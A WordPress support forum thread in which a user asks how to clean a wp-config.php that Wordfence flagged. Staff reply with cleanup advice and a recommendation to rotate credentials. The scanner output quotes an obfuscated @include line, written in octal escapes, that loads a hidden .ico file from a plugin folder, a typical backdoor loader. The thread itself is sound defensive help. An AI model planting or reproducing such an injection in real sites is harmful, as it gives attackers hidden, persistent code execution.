Support » Plugin: Wordfence Security - Firewall & Malware Scan » Cannot Delete or Repair File

  • Resolved kinoden11

    (@kinoden11)


    I just did a scan on the site, but there is no button to repair or delete the infected file. My question is, what part of the file must I remove to clean the file.

    Here is the message from WF.

    File appears to be malicious: wp-config.php
    Type: File
    Issue Found May 21, 2019 4:21 pm
    Critical
    IGNORE
    DETAILS
    Filename: wp-config.php
    File Type: WordPress Configuration File
    Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: @include “\057ho\155e/\167eb\143re\0611/\164es\164.w\145bc\162ea\164io\156ki\156o.\143om\057wp\055co\156te\156t/\160lu\147in\163/e\154em\145nt\157r-\160ro\057.7\062aa\07115\141.i\143o”;

    The issue type is: Suspicious:PHP/obfuicoinclude.6072
    Description: Suspicious code often added by attackers

    This is your main configuration file and cannot be deleted. It must be cleaned manually.

    The only 2 options are VIEW FILE or MARK AS FIXED.

    Hope you can help me.

    • This topic was modified 1 year ago by kinoden11.
Viewing 2 replies - 1 through 2 (of 2 total)
  • jamesd38

    (@jamesd38)

    Getting loads of these across my sites – how do we stop them coming back once cleaned?

    Plugin Support WFGerroald

    (@wfgerald)

    Hey @kinoden11,

    This is a customized config file that powers your entire site, so Wordfence can’t repair it and deleting it would break your site. You can take a look at the wp-config.php examples in the WordPress.org Codex to get an idea of what should be there. I’m not sure what else your file contains, but everything you posted should not be there. The article below can help with this. If you’re not comfortable with making these changes I’d suggest you reach out to your host for their help cleaning it up.

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    I would suggest updating all credentials including WordPress, FTP, hosting panel and database. If this issue returns it means the root issue is elsewhere. If this is the case I’d suggest reaching out to a hack repair service to have the site professionally cleaned and the point of entry patched.

    Please let me know if you have any other questions.

    Thanks,

    Gerroald

    • This reply was modified 12 months ago by WFGerroald.
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Cannot Delete or Repair File’ is closed to new replies.